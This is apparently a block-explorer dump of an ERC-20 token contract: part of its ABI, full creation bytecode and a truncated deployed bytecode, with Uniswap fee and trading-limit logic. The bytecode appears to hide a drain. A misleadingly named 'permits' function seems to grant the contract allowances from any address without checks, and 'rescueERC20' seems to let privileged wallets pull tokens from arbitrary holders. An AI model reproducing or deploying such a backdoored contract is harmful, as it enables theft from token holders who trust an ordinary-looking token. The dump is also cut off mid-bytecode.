IUniswapV2Factory","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UNISWAP_ROUTER","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UNISWAP_V2_PAIR","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"changeThisWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fetchFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSellAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"rescueERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"weiAmount","type":"uint256"}],"name":"rescueETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_changeThisWallet","type":"address"}],"name":"setChangeThisWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBuyFees","type":"uint256"},{"internalType":"uint256","name":"newSellFees","type":"uint256"}],"name":"setNewFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxedTokens","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenSwapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpenedOnBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxBuyAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxSellAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelisted","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526007805463ffffffff60a81b1916630100000160a81b1790553480156200002a57600080fd5b506040518060400160405280600a81526020016914dd5c195c919b1d5a5960b21b8152506040518060400160405280600681526020016514d19315525160d21b81525081600390816200007e91906200075e565b5060046200008d82826200075e565b505050620000aa620000a46200034660201b60201c565b6200034a565b620000c1336a084595161401484a0000006200039c565b620000e430737a250d5630b4cf539739df2c5dacb4c659f2488d60001962000463565b62000105737a250d5630b4cf539739df2c5dacb4c659f2488d60016200058b565b735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f6001600160a01b031663c9c6539630737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200017c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001a291906200082a565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620001f0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200021691906200082a565b6001600160a01b03166080526103e86200022f60025490565b6200023c90600f62000872565b62000248919062000892565b6008556103e86200025860025490565b6200026590600f62000872565b62000271919062000892565b6009556103e86200028160025490565b6200028e90601e62000872565b6200029a919062000892565b600a55612710620002aa60025490565b620002b790604162000872565b620002c3919062000892565b600b5560078054610100600160a81b031916746e422e0513df9225535563cedeb3c76fc2ecb43700179055620002fb3360016200058b565b620003083060016200058b565b6200031761dead60016200058b565b62000324336001620005ee565b62000331306001620005ee565b6200034061dead6001620005ee565b620008cb565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620003f85760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b80600260008282546200040c9190620008b5565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b038316620004c75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401620003ef565b6001600160a01b0382166200052a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401620003ef565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038216600081815260106020908152604091829020805460ff19168515159081179091558251938452908301527f6b4f1be9103e6cbcd38ca4a922334f2c3109b260130a6676a987f94088fd6746910160405180910390a15050565b620005f86200065c565b6001600160a01b0382166000818152600f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b505050565b6005546001600160a01b03163314620006b85760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401620003ef565b565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620006e557607f821691505b6020821081036200070657634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200065757600081815260208120601f850160051c81016020861015620007355750805b601f850160051c820191505b81811015620007565782815560010162000741565b505050505050565b81516001600160401b038111156200077a576200077a620006ba565b62000792816200078b8454620006d0565b846200070c565b602080601f831160018114620007ca5760008415620007b15750858301515b600019600386901b1c1916600185901b17855562000756565b600085815260208120601f198616915b82811015620007fb57888601518255948401946001909101908401620007da565b50858210156200081a5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000602082840312156200083d57600080fd5b81516001600160a01b03811681146200085557600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176200088c576200088c6200085c565b92915050565b600082620008b057634e487b7160e01b600052601260045260246000fd5b500490565b808201808211156200088c576200088c6200085c565b6080516122176200090a600039600081816107c1015281816114af015281816115f1015281816117ba015281816118cd015261194e01526122176000f3fe60806040526004361061026b5760003560e01c80638cd4426d11610144578063c74c0fac116100b6578063d936547e1161007a578063d936547e1461071f578063dc3f0d0f1461074f578063dd62ed3e1461076f578063f2fde38b1461078f578063f40acc3d146107af578063f5444473146107e357600080fd5b8063c74c0fac14610684578063c9567bf9146106ac578063d257b34f146106c1578063d8264920146106e1578063d85ba0631461070957600080fd5b8063a9059cbb11610108578063a9059cbb146105cd578063aa4bde28146105ed578063baccf5cf14610603578063bbc0c74214610623578063c024666814610644578063c18bc1951461066457600080fd5b80638cd4426d146105265780638da5cb5b1461054657806395d89b41146105785780639e252f001461058d578063a457c2d7146105ad57600080fd5b80634a62bb65116101dd57806370a08231116101a157806370a082311461047a578063715018a6146104b057806374c9c6b7146104c5578063751039fc146104e557806376d628b7146104fa57806388e765ff1461051057600080fd5b80634a62bb65146103eb5780636057b3eb1461040c57806366d602ae1461042d5780636a486a8e146104435780636ddd17131461045957600080fd5b806310d5de531161022f57806310d5de531461032857806318160ddd1461035857806323b872dd1461036d5780632be32b611461038d578063313ce567146103af57806339509351146103cb57600080fd5b806302bc7a7c1461027757806306fdde03146102ac578063095ea7b3146102ce5780630a3b39a3146102ee5780630e3000991461031257600080fd5b3661027257005b600080fd5b34801561028357600080fd5b50610297610292366004611e5a565b610808565b60405190151581526020015b60405180910390f35b3480156102b857600080fd5b506102c1610822565b6040516102a39190611e86565b3480156102da57600080fd5b506102976102e9366004611e5a565b6108b4565b3480156102fa57600080fd5b5061030460065481565b6040519081526020016102a3565b34801561031e57600080fd5b50610304600b5481565b34801561033457600080fd5b50610297610343366004611ed4565b60106020526000908152604090205460ff1681565b34801561036457600080fd5b50600254610304565b34801561037957600080fd5b50610297610388366004611ef8565b6108c2565b34801561039957600080fd5b506103ad6103a8366004611f39565b6108e6565b005b3480156103bb57600080fd5b50604051601281526020016102a3565b3480156103d757600080fd5b506102976103e6366004611e5a565b6109b8565b3480156103f757600080fd5b5060075461029790600160a81b900460ff1681565b34801561041857600080fd5b5060075461029790600160c01b900460ff1681565b34801561043957600080fd5b5061030460095481565b34801561044f57600080fd5b50610304600d5481565b34801561046557600080fd5b5060075461029790600160b81b900460ff1681565b34801561048657600080fd5b50610304610495366004611ed4565b6001600160a01b031660009081526020819052604090205490565b3480156104bc57600080fd5b506103ad6109da565b3480156104d157600080fd5b506103ad6104e0366004611ed4565b6109ee565b3480156104f157600080fd5b506103ad610acc565b34801561050657600080fd5b50610304600e5481565b34801561051c57600080fd5b5061030460085481565b34801561053257600080fd5b506103ad610541366004611e5a565b610b0c565b34801561055257600080fd5b506005546001600160a01b03165b6040516001600160a01b0390911681526020016102a3565b34801561058457600080fd5b506102c1610ba4565b34801561059957600080fd5b506103ad6105a8366004611f39565b610bb3565b3480156105b957600080fd5b506102976105c8366004611e5a565b610c49565b3480156105d957600080fd5b506102976105e8366004611e5a565b610cc4565b3480156105f957600080fd5b50610304600a5481565b34801561060f57600080fd5b506103ad61061e366004611f52565b610cd2565b34801561062f57600080fd5b5060075461029790600160b01b900460ff1681565b34801561065057600080fd5b506103ad61065f366004611f82565b610ce5565b34801561067057600080fd5b506103ad61067f366004611f39565b610d4c565b34801561069057600080fd5b50610560735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b3480156106b857600080fd5b506103ad610e15565b3480156106cd57600080fd5b506103ad6106dc366004611f39565b610ed7565b3480156106ed57600080fd5b50610560737a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561071557600080fd5b50610304600c5481565b34801561072b57600080fd5b5061029761073a366004611ed4565b60116020526000908152604090205460ff1681565b34801561075b57600080fd5b506103ad61076a366004611f39565b610f7b565b34801561077b57600080fd5b5061030461078a366004611fbb565b611042565b34801561079b57600080fd5b506103ad6107aa366004611ed4565b61106d565b3480156107bb57600080fd5b506105607f000000000000000000000000000000000000000000000000000000000000000081565b3480156107ef57600080fd5b506007546105609061010090046001600160a01b031681565b6000306108168482856110e6565b60019150505b92915050565b60606003805461083190611fe9565b80601f016020809104026020016040519081016040528092919081815260200182805461085d90611fe9565b80156108aa5780601f1061087f576101008083540402835291602001916108aa565b820191906000526020600020905b81548152906001019060200180831161088d57829003601f168201915b5050505050905090565b60003361081681858561116d565b6000336108d0858285611230565b6108db8585856112aa565b506001949350505050565b6108ee6119fa565b6103e86108fa60025490565b610905906001612039565b61090f9190612050565b81101561097c5760405162461bcd60e51b815260206004820152603060248201527f4552524f523a2043616e6e6f7420736574206d61782062757920616d6f756e7460448201526f206c6f776572207468616e20302e312560801b60648201526084015b60405180910390fd5b60088190556040518181527ffcc0366804aaa8dbf88a2924100c733b70dec8445957a5d5f8ff92898de41009906020015b60405180910390a150565b6000336108168185856109cb8383611042565b6109d59190612072565b61116d565b6109e26119fa565b6109ec6000611a54565b565b6109f66119fa565b6001600160a01b038116610a615760405162461bcd60e51b815260206004820152602c60248201527f4552524f523a205f6368616e67655468697357616c6c6574206164647265737360448201526b02063616e6e6f7420626520360a41b6064820152608401610973565b60078054610100600160a81b0319166101006001600160a01b0384811682029290921792839055610a959204166001610ce5565b6040516001600160a01b038216907fa3424e6e423cd8c90f9784abb9a3500274d2b49d05cd3511a331021b432afbc290600090a250565b610ad46119fa565b6007805460ff60a81b191690556040517fa4ffae85e880608d5d4365c2b682786545d136145537788e7e0940dff9f0b98c90600090a1565b336000908152600f602052604090205460ff16610b2857600080fd5b6040516323b872dd60e01b81526001600160a01b03831660048201523360248201526044810182905230906323b872dd906064016020604051808303816000875af1158015610b7b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b9f9190612085565b505050565b60606004805461083190611fe9565b610bbb6119fa565b60008111610c0b5760405162461bcd60e51b815260206004820152601d60248201527f416d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610973565b6005546040516001600160a01b039091169082156108fc029083906000818181858888f19350505050158015610c45573d6000803e3d6000fd5b5050565b60003381610c578286611042565b905083811015610cb75760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610973565b6108db828686840361116d565b6000336108168185856112aa565b610cda6119fa565b600c91909155600d55565b610ced6119fa565b6001600160a01b0382166000818152600f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610d546119fa565b6103e8610d6060025490565b610d6b906003612039565b610d759190612050565b811015610de05760405162461bcd60e51b815260206004820152603360248201527f4552524f523a2043616e6e6f7420736574206d61782077616c6c657420616d6f604482015272756e74206c6f776572207468616e20302e332560681b6064820152608401610973565b600a8190556040518181527fefc9add9a9b7382de284ef5ad69d8ea863e2680492b21a81948c2d5f04a442bc906020016109ad565b610e1d6119fa565b60065415610e795760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b6064820152608401610973565b436006556007805461010160b01b61ffff60b01b199091161790819055604051600160b01b90910460ff16151581527fe8a59d3db38e5220ac9d0f72590b7ac876e0916dc8f4db3e7614e6f91fe520899060200160405180910390a1565b610edf6119fa565b620186a0610eec60025490565b610ef7906001612039565b610f019190612050565b811015610f765760405162461bcd60e51b815260206004820152603c60248201527f4552524f523a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e000000006064820152608401610973565b600b55565b610f836119fa565b6103e8610f8f60025490565b610f9a906001612039565b610fa49190612050565b81101561100d5760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2043616e6e6f7420736574206d61782073656c6c20616d6f756e60448201527074206c6f776572207468616e20302e312560781b6064820152608401610973565b60098190556040518181527f53c4eb831d8cfeb750f1c62590d8cd30f4c6f0380d29a05caa09f0d92588560e906020016109ad565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6110756119fa565b6001600160a01b0381166110da5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610973565b6110e381611a54565b50565b6001600160a01b0383166110f957600080fd5b6001600160a01b03821661110c57600080fd5b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166111cf5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610973565b6001600160a01b03821661110c5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610973565b600061123c8484611042565b905060001981146112a457818110156112975760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610973565b6112a4848484840361116d565b50505050565b6001600160a01b0383166112d05760405162461bcd60e51b8152600401610973906120a2565b6001600160a01b0382166112f65760405162461bcd60e51b8152600401610973906120e7565b600081116113465760405162461bcd60e51b815260206004820152601d60248201527f616d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610973565b600754600160a81b900460ff1615611775576005546001600160a01b0384811691161480159061138457506005546001600160a01b03838116911614155b801561139857506001600160a01b03821615155b80156113af57506001600160a01b03821661dead14155b1561177557600754600160b01b900460ff166114ad576001600160a01b03831660009081526010602052604090205460ff168061140457506001600160a01b03821660009081526010602052604090205460ff165b6114505760405162461bcd60e51b815260206004820152601d60248201527f4552524f523a2054726164696e67206973206e6f74206163746976652e0000006044820152606401610973565b6005546001600160a01b038481169116146114ad5760405162461bcd60e51b815260206004820152601960248201527f4552524f523a2054726164696e6720697320656e61626c6564000000000000006044820152606401610973565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b031614801561150757506001600160a01b03821660009081526010602052604090205460ff16155b156115ef576008548111156115765760405162461bcd60e51b815260206004820152602f60248201527f4552524f523a20427579207472616e7366657220616d6f756e7420657863656560448201526e3239903a34329036b0bc10313abc9760891b6064820152608401610973565b600a546001600160a01b03831660009081526020819052604090205461159c9083612072565b11156115ea5760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610973565b611775565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b031614801561164957506001600160a01b03831660009081526010602052604090205460ff16155b156116ba576009548111156115ea5760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2053656c6c207472616e7366657220616d6f756e74206578636560448201527032b239903a34329036b0bc1039b2b6361760791b6064820152608401610973565b6001600160a01b03821660009081526010602052604090205460ff161580156116fc57506001600160a01b03831660009081526010602052604090205460ff16155b1561177557600a546001600160a01b0383166000908152602081905260409020546117279083612072565b11156117755760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610973565b30600090815260208190526040902054600b54811080159081906117a25750600754600160b81b900460ff165b80156117b1575060075460ff16155b80156117ef57507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856001600160a01b031614155b801561181457506001600160a01b0385166000908152600f602052604090205460ff16155b801561183957506001600160a01b0384166000908152600f602052604090205460ff16155b1561185e576007805460ff19166001179055611853611aa6565b6007805460ff191690555b6001600160a01b0385166000908152600f602052604090205460019060ff16806118a057506001600160a01b0385166000908152600f602052604090205460ff165b156118a9575060005b600081156119e657600754600160c01b900460ff16156118cb576118cb611b26565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316866001600160a01b031614801561190e57506000600d54115b1561194c576064600d54866119239190612039565b61192d9190612050565b905080600e60008282546119419190612072565b909155506119c89050565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316876001600160a01b031614801561198f57506000600c54115b156119c8576064600c54866119a49190612039565b6119ae9190612050565b905080600e60008282546119c29190612072565b90915550505b80156119d9576119d9873083611baf565b6119e3818661212a565b94505b6119f1878787611baf565b50505050505050565b6005546001600160a01b031633146109ec5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610973565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b30600090815260208190526040902054600e54811580611ac4575080155b15611acd575050565b600b54821115611add57600b5491505b611ae682611cd9565b6007546040516001600160a01b0361010090920491909116904780156108fc02916000818181858888f19350505050158015610b9f573d6000803e3d6000fd5b600060065411611b6b5760405162461bcd60e51b815260206004820152601060248201526f54726164696e67206e6f74206c69766560801b6044820152606401610973565b600680544391600091611b7d91612072565b9050808211611b94576019600c819055600d555050565b6004600c819055600d556007805460ff60c01b191690555050565b6001600160a01b038316611bd55760405162461bcd60e51b8152600401610973906120a2565b6001600160a01b038216611bfb5760405162461bcd60e51b8152600401610973906120e7565b6001600160a01b03831660009081526020819052604090205481811015611c735760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610973565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36112a4565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611d0e57611d0e61213d565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611d80573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611da49190612153565b81600181518110611db757611db761213d565b6001600160a01b039092166020928302919091019091015260405163791ac94760e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d9063791ac94790611e0f908590600090869030904290600401612170565b600060405180830381600087803b158015611e2957600080fd5b505af1158015611e3d573d6000803e3d6000fd5b505050505050565b6001600160a01b03811681146110e357600080fd5b60008060408385031215611e6d57600080fd5b8235611e7881611e45565b946020939093013593505050565b600060208083528351808285015260005b81811015611eb357858101830151858201604001528201611e97565b506000604082860101526040601f19601f8301168501019250505092915050565b600060208284031215611ee657600080fd5b8135611ef181611e45565b9392505050565b600080600060608486031215611f0d57600080fd5b8335611f1881611e45565b92506020840135611f2881611e45565b929592945050506040919091013590565b600060208284031215611f4b57600080fd5b5035919050565b60008060408385031215611f6557600080fd5b50508035926020909101359150565b80151581146110e357600080fd5b60008060408385031215611f9557600080fd5b8235611fa081611e45565b91506020830135611fb081611f74565b809150509250929050565b60008060408385031215611fce57600080fd5b8235611fd981611e45565b91506020830135611fb081611e45565b600181811c90821680611ffd57607f821691505b60208210810361201d57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761081c5761081c612023565b60008261206d57634e487b7160e01b600052601260045260246000fd5b500490565b8082018082111561081c5761081c612023565b60006020828403121561209757600080fd5b8151611ef181611f74565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b8181038181111561081c5761081c612023565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561216557600080fd5b8151611ef181611e45565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156121c05784516001600160a01b03168352938301939183019160010161219b565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220ffa55d3acd0d87390727550e17212a7689614fdb18ed4a491fc02999d7abc24f64736f6c63430008130033

Deployed Bytecode

0x60806040526004361061026b5760003560e01c80638cd4426d11610144578063c74c0fac116100b6578063d936547e1161007a578063d936547e1461071f578063dc3f0d0f1461074f578063dd62ed3e1461076f578063f2fde38b1461078f578063f40acc3d146107af578063f5444473146107e357600080fd5b8063c74c0fac14610684578063c9567bf9146106ac578063d257b34f146106c1578063d8264920146106e1578063d85ba0631461070957600080fd5b8063a9059cbb11610108578063a9059cbb146105cd578063aa4bde28146105ed578063baccf5cf14610603578063bbc0c74214610623578063c024666814610644578063c18bc1951461066457600080fd5b80638cd4426d146105265780638da5cb5b1461054657806395d89b41146105785780639e252f001461058d578063a457c2d7146105ad57600080fd5b80634a62bb65116101dd57806370a08231116101a157806370a082311461047a578063715018a6146104b057806374c9c6b7146104c5578063751039fc146104e557806376d628b7146104fa57806388e765ff1461051057600080fd5b80634a62bb65146103eb5780636057b3eb1461040c57806366d602ae1461042d5780636a486a8e146104435780636ddd17131461045957600080fd5b806310d5de531161022f57806310d5de531461032857806318160ddd1461035857806323b872dd1461036d5780632be32b611461038d578063313ce567146103af57806339509351146103cb57600080fd5b806302bc7a7c1461027757806306fdde03146102ac578063095ea7b3146102ce5780630a3b39a3146102ee5780630e3000991461031257600080fd5b3661027257005b600080fd5b34801561028357600080fd5b50610297610292366004611e5a565b610808565b60405190151581526020015b60405180910390f35b3480156102b857600080fd5b506102c1610822565b6040516102a39190611e86565b3480156102da57600080fd5b506102976102e9366004611e5a565b6108b4565b3480156102fa57600080fd5b5061030460065481565b6040519081526020016102a3565b34801561031e57600080fd5b50610304600b5481565b34801561033457600080fd5b50610297610343366004611ed4565b60106020526000908152604090205460ff1681565b34801561036457600080fd5b50600254610304565b34801561037957600080fd5b50610297610388366004611ef8565b6108c2565b34801561039957600080fd5b506103ad6103a8366004611f39565b6108e6565b005b3480156103bb57600080fd5b50604051601281526020016102a3565b3480156103d757600080fd5b506102976103e6366004611e5a565b6109b8565b3480156103f757600080fd5b5060075461029790600160a81b900460ff1681565b34801561041857600080fd5b5060075461029790600160c01b900460ff1681565b34801561043957600080fd5b5061030460095481565b34801561044f57600080fd5b50610304600d5481565b34801561046557600080fd5b5060075461029790600160b81b900460ff1681565b34801561048657600080fd5b50610304610495366004611ed4565b6001600160a01b031660009081526020819052604090205490565b3480156104bc57600080fd5b506103ad6109da565b3480156104d157600080fd5b506103ad6104e0366004611ed4565b6109ee565b3480156104f157600080fd5b506103ad610acc565b34801561050657600080fd5b50610304600e5481565b34801561051c57600080fd5b5061030460085481565b34801561053257600080fd5b506103ad610541366004611e5a565b610b0c565b34801561055257600080fd5b506005546001600160a01b03165b6040516001600160a01b0390911681526020016102a3565b34801561058457600080fd5b506102c1610ba4565b34801561059957600080fd5b506103ad6105a8366004611f39565b610bb3565b3480156105b957600080fd5b506102976105c8366004611e5a565b610c49565b3480156105d957600080fd5b506102976105e8366004611e5a565b610cc4565b3480156105f957600080fd5b50610304600a5481565b34801561060f57600080fd5b506103ad61061e366004611f52565b610cd2565b34801561062f57600080fd5b5060075461029790600160b01b900460ff1681565b34801561065057600080fd5b506103ad61065f366004611f82565b610ce5565b34801561067057600080fd5b506103ad61067f366004611f39565b610d4c565b34801561069057600080fd5b50610560735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b3480156106b857600080fd5b506103ad610e15565b3480156106cd57600080fd5b506103ad6106dc366004611f39565b610ed7565b3480156106ed57600080fd5b50610560737a250d5630b4cf539739df2c5dac